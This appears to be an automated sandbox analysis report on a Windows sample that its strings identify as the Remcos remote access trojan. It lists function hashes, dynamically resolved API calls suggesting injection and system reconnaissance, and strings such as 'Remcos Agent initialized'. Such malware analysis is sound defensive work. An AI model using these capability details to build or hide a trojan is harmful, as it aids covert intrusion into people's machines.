Instruction Fuzzy Hash: A8D0A7F066B50CD6E370E664D805BADB6ACC743312F805444A40E135508AB11E50DA62

Uniqueness

Uniqueness Score: -1.00%

Function 07331D31 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c32cbd613f4e3e3ce1d3eae948f3a703d094f97270c3d2b1b7ece3ee3bedcc1
Instruction ID: eb239d081ed13ca53641b9b2aa3e61927ef57aade83262f234fb05290c9a18bf
Opcode Fuzzy Hash: 9c32cbd613f4e3e3ce1d3eae948f3a703d094f97270c3d2b1b7ece3ee3bedcc1
Instruction Fuzzy Hash: 44D0A77056E94D4EE3125764AC193B83F84270332AF09550CE08C424FBCF648008CA62

Uniqueness

Uniqueness Score: -1.00%

Function 07331D40 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d54d7197352a9dad1eb907e1087a1cc30ff313e95e1c805fb05625b1c7802ec5
Instruction ID: 5f13f06a25b6a6f9c3a1b280c7d9d17e03af42ea71830d8ecc171020a3ebe921
Opcode Fuzzy Hash: d54d7197352a9dad1eb907e1087a1cc30ff313e95e1c805fb05625b1c7802ec5
Instruction Fuzzy Hash: 2CC08CB142BA0C8AD62022A4A1093B03BDC1303222F402404E00D0043A8F608014D566

Uniqueness

Uniqueness Score: -1.00%

Function 07330B01 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff6cbd2a4a15c257bfb653703231914b7dc21c9b2e63f188083dadb7b1e9c06
Instruction ID: 6d7f906e468e30f90240400adcc10e8d2a38520b26157ca586e43cf800439e1e
Opcode Fuzzy Hash: 9ff6cbd2a4a15c257bfb653703231914b7dc21c9b2e63f188083dadb7b1e9c06
Instruction Fuzzy Hash: 05C09B7462A2119BD604C744D88187CF765EB4A704B24D145D81D47743C733E90389C5

Uniqueness

Uniqueness Score: -1.00%

Function 073304CE Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2070281727.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7330000_mQpdTSxCjbPop.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3fe00e4ff84f805323dc20573a2cc8497aee9dd045f18a059f45f3e5d3790c2
Instruction ID: 93714cb7f8c9a87895faa0b31088948bf0d9b53bb6d33f92352ee12b9b2c7256
Opcode Fuzzy Hash: c3fe00e4ff84f805323dc20573a2cc8497aee9dd045f18a059f45f3e5d3790c2
Instruction Fuzzy Hash: 23C04CF4E25268CFAB24CFB0D40445D7A75BA05305B241929D407A3702DB3045018E15

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mQpdTSxCjbPop.exePID: 6256, Parent PID: 4304COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	544
Total number of Limit Nodes:	14

Executed Functions

Function 0041CB50 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
GetProcAddress.KERNEL32(00000000), ref: 0041CB88
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
GetProcAddress.KERNEL32(00000000), ref: 0041CC11
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
GetProcAddress.KERNEL32(00000000), ref: 0041CC25
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
GetProcAddress.KERNEL32(00000000), ref: 0041CC39
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
GetProcAddress.KERNEL32(00000000), ref: 0041CC61
GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
GetProcAddress.KERNEL32(00000000), ref: 0041CC75
LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
GetProcAddress.KERNEL32(00000000), ref: 0041CC86
LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
GetProcAddress.KERNEL32(00000000), ref: 0041CD07
LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
GetProcAddress.KERNEL32(00000000), ref: 0041CD4C

Strings

SetProcessDEPPolicy, xrefs: 0041CC13
GetMonitorInfoW, xrefs: 0041CC4F
GetFinalPathNameByHandleW, xrefs: 0041CCF5
RmEndSession, xrefs: 0041CD3E
GetComputerNameExW, xrefs: 0041CBEB
NtQueryInformationProcess, xrefs: 0041CCE1
GetSystemTimes, xrefs: 0041CC63
NtSuspendProcess, xrefs: 0041CC9C
GetExtendedTcpTable, xrefs: 0041CCBC
EnumDisplayMonitors, xrefs: 0041CC3B
GetExtendedUdpTable, xrefs: 0041CCD1
NtResumeProcess, xrefs: 0041CCAC
IsWow64Process, xrefs: 0041CBD7
kernel32, xrefs: 0041CBCD, 0041CBDC, 0041CBF0, 0041CC18, 0041CC68, 0041CC8D, 0041CCFA
EnumDisplayDevicesW, xrefs: 0041CC27
NtUnmapViewOfSection, xrefs: 0041CBB8
SetProcessDpiAwareness, xrefs: 0041CB8F, 0041CB94, 0041CBA8
Shlwapi, xrefs: 0041CC79
Rstrtmgr, xrefs: 0041CD0E, 0041CD18, 0041CD23, 0041CD33, 0041CD43
Psapi, xrefs: 0041CB60
Iphlpapi, xrefs: 0041CCC1, 0041CCCB, 0041CCD6
GlobalMemoryStatusEx, xrefs: 0041CBC8
GetProcessImageFileNameW, xrefs: 0041CB5A, 0041CB5F, 0041CB7F
Shell32, xrefs: 0041CC04
RmRegisterResources, xrefs: 0041CD1E
GetConsoleWindow, xrefs: 0041CC88
RmGetList, xrefs: 0041CD2E
ntdll, xrefs: 0041CBBD, 0041CBC2, 0041CCA1, 0041CCB1, 0041CCE6
user32, xrefs: 0041CBA9, 0041CC2C, 0041CC40, 0041CC54
shcore, xrefs: 0041CB95
IsUserAnAdmin, xrefs: 0041CBFF
Kernel32, xrefs: 0041CB80
RmStartSession, xrefs: 0041CD09

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
API String ID: 4236061018-3687161714
Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

Uniqueness

Uniqueness Score: -1.00%

Function 004432B5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
TerminateProcess.KERNEL32(00000000), ref: 004432DD
ExitProcess.KERNEL32 ref: 004432EF

Strings

PkGNG, xrefs: 004432B7

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: PkGNG
API String ID: 1703294689-263838557
Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9C5 Relevance: 84.8, APIs: 14, Strings: 34, Instructions: 795
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000104), ref: 0040E9EE

Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C

Strings

SG, xrefs: 0040EB62
PG, xrefs: 0040F12B
PG, xrefs: 0040F036
PG, xrefs: 0040EF66
8SG, xrefs: 0040EE65
license_code.txt, xrefs: 0040EA4D
licence, xrefs: 0040EF88
PG, xrefs: 0040ED7B
Inj, xrefs: 0040EBD5, 0040EBEC
PG, xrefs: 0040F154
PG, xrefs: 0040EA96
PG, xrefs: 0040EEAC
exepath, xrefs: 0040EE92, 0040EF40
del, xrefs: 0040F2ED, 0040F36F
PG, xrefs: 0040F1F3
C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 0040E9E6, 0040EE0F
PG, xrefs: 0040ED47
8SG, xrefs: 0040EF1D
PG, xrefs: 0040EDD3
PG, xrefs: 0040F103
del, xrefs: 0040F2D1
PG, xrefs: 0040F0D8
User, xrefs: 0040F28E
Software\, xrefs: 0040EAC3
Remcos Agent initialized, xrefs: 0040EFEF
PG, xrefs: 0040F1C7
Administrator, xrefs: 0040F287
PG, xrefs: 0040F187
Exe, xrefs: 0040EB0F
SG, xrefs: 0040EB05
PSG, xrefs: 0040F224
PG, xrefs: 0040EA5D
Access Level: , xrefs: 0040F29F
dMG, xrefs: 0040F1A8

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
API String ID: 2830904901-3975421309
Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

Uniqueness

Uniqueness Score: -1.00%

Function 00404E26 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 65
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
SetEvent.KERNEL32(?), ref: 00404E43
FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
closesocket.WS2_32(?), ref: 00404E5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
SetEvent.KERNEL32(?), ref: 00404EA2
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
SetEvent.KERNEL32(?), ref: 00404EBA
CloseHandle.KERNEL32(?), ref: 00404EBF
CloseHandle.KERNEL32(?), ref: 00404EC4
SetEvent.KERNEL32(?), ref: 00404ED1
CloseHandle.KERNEL32(?), ref: 00404ED6

Strings

PkGNG, xrefs: 00404E28

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
String ID: PkGNG
API String ID: 2403171778-263838557
Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000), ref: 00448307
SetLastError.KERNEL32(00000000), ref: 00448310

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Uniqueness

Uniqueness Score: -1.00%

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
GetLastError.KERNEL32 ref: 0040D083

Strings

SG, xrefs: 0040D069

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutex
String ID: SG
API String ID: 1925916568-3189917014
Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

Uniqueness

Uniqueness Score: -1.00%

Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

Uniqueness

Uniqueness Score: -1.00%

Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

Uniqueness

Uniqueness Score: -1.00%

Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC

Uniqueness

Uniqueness Score: -1.00%

Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00407CB9
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
DeleteFileW.KERNEL32(00000000), ref: 00407DA9

